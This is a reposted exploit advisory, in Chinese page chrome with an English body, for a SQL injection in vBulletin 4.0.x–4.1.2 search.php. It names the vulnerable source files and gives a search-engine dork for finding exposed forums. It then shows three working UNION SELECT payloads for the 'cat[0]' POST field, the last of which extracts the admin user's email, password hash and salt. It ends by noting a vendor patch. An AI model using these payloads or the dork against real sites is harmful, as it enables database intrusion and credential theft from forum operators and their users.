vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞-阿里云开发者社区

vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞

2017-11-15 1353

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~ 888-~88e ,d888 _d88__     #
#   d888 888   d888   888    888d8b    888 888b   888 888       #
#   8888 888 / 888   888    888Y88b   888 8888   888 888       #
#   Y888 888 /__888__ 888    888 Y88b 888 888P   888 888       #
#    "88_/888    888   888    888 Y88b 888-_88"    888 "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb /search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb #4.1.3.

UPDATE NOW!

本文转自enables 51CTO博客，原文链接：http://blog.51cto.com/niuzu/580967，如需转载请自行联系原作者

vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞

热门文章

最新文章

相关课程

相关电子书

相关实验场景